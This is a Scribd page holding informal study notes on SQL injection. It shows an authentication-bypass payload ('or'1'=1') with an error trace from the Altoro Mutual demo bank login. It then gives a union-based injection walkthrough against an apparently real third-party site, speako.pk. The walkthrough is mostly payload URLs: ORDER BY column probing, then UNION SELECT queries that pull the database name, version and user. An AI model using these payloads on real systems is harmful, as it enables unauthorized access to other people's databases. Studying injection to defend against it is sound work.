Location via proxy:   [ UP ]  
[Report a bug]   [Manage cookies]                
Scribd Logo
Upload

Welcome to Scribd!

  • 92 views

    'Or'1' 1' - An Error Has Occurred: Summary

    Uploaded by

    Thirumala Kakani
    This document describes an SQL injection error that occurred due to a syntax error in the query expression. It provides the error message and stack trace detailing that the error was caused by a missing operator in the username and password values, which contained malicious SQL code ('or'1'=1).

    Copyright:

    © All Rights Reserved
    Download as DOCX, PDF, TXT or read online from Scribd

    'Or'1' 1' - An Error Has Occurred: Summary

    Uploaded by

    Thirumala Kakani
    92 views4 pages
    This document describes an SQL injection error that occurred due to a syntax error in the query expression. It provides the error message and stack trace detailing that the error was caused by a missing operator in the username and password values, which contained malicious SQL code ('or'1'=1).

    Original Description:

    sql injection

    Original Title

    SQL Injection

    Copyright

    © © All Rights Reserved

    Available Formats

    DOCX, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    This document describes an SQL injection error that occurred due to a syntax error in the query expression. It provides the error message and stack trace detailing that the error was caused by a missing operator in the username and password values, which contained malicious SQL code ('or'1'=1).

    Copyright:

    © All Rights Reserved
    Download as DOCX, PDF, TXT or read online from Scribd
    Download as docx, pdf, or txt
    92 views4 pages

    'Or'1' 1' - An Error Has Occurred: Summary

    Uploaded by

    Thirumala Kakani
    This document describes an SQL injection error that occurred due to a syntax error in the query expression. It provides the error message and stack trace detailing that the error was caused by a missing operator in the username and password values, which contained malicious SQL code ('or'1'=1).

    Copyright:

    © All Rights Reserved
    Download as DOCX, PDF, TXT or read online from Scribd
    Download as docx, pdf, or txt
    You are on page 1of 4

    'or'1'=1' ------

    An Error Has Occurred


    Summary:
    Syntax error (missing operator) in query expression 'username = ''or'1'=1'' AND password = ''or'1'=1'''.

    Error Message:
    System.Data.OleDb.OleDbException: Syntax error (missing operator) in query expression 'username = ''or'1'=1'' AND
    password = ''or'1'=1'''. at System.Data.OleDb.OleDbCommand.ExecuteCommandTextErrorHandling(OleDbHResult hr)
    at System.Data.OleDb.OleDbCommand.ExecuteCommandTextForSingleResult(tagDBPARAMS dbParams, Object&
    executeResult) at System.Data.OleDb.OleDbCommand.ExecuteCommandText(Object& executeResult) at
    System.Data.OleDb.OleDbCommand.ExecuteCommand(CommandBehavior behavior, Object& executeResult) at
    System.Data.OleDb.OleDbCommand.ExecuteReaderInternal(CommandBehavior behavior, String method) at
    System.Data.OleDb.OleDbCommand.ExecuteReader(CommandBehavior behavior) at
    System.Data.OleDb.OleDbCommand.System.Data.IDbCommand.ExecuteReader(CommandBehavior behavior) at
    System.Data.Common.DbDataAdapter.FillInternal(DataSet dataset, DataTable[] datatables, Int32 startRecord, Int32
    maxRecords, String srcTable, IDbCommand command, CommandBehavior behavior) at
    System.Data.Common.DbDataAdapter.Fill(DataSet dataSet, Int32 startRecord, Int32 maxRecords, String srcTable,
    IDbCommand command, CommandBehavior behavior) at System.Data.Common.DbDataAdapter.Fill(DataSet dataSet,
    String srcTable) at Altoro.Authentication.ValidateUser(String uName, String pWord) in
    c:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs:line 68 at Altoro.Authentication.Page_Load(Object sender,
    EventArgs e) in c:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs:line 33 at
    System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) at
    System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) at
    System.Web.UI.Control.OnLoad(EventArgs e) at System.Web.UI.Control.LoadRecursive() at
    System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean
    includeStagesAfterAsyncPoint)
    s
    Union/error based sql injection:-

    In thi sql injection we are trying the old method menas authentication bypass method but it wont
    work . so we can try in different manner

    If we open any website ---it having number of subpages ---

    Eg :- speako.pk

    Every website having number of subpages (tabs) we can go through any of the ab it will display the id
    of that one the id will display left bottom of the screen

    We are open any tab and inject at the end of url ----it diaplays

    -blankpage

    -error message

    --- datalose ( some of the images are content is lost from website)

    Speako.pk at the end put

    http://speako.pk/page.php?id=165order by 1-- (nochanges)

    http://speako.pk/page.php?id=165order by 14-- (n0 changes)

    when we give order by 15 ---it displays blank page --- ( means 14 columns in that application r database)

    http://speako.pk/page.php?id=165 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14

    the above one is used to identify which clumns are more vulnerables..

    http://speako.pk/page.php?id=165 union select 1,database(),3,4,5,6,7,8,9,10,11,12,13,14

    http://speako.pk/page.php?id=165 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14

    http://speako.pk/page.php?id=165 union select 1,user(),3,4,5,6,7,8,9,10,11,12,13,14

    You might also like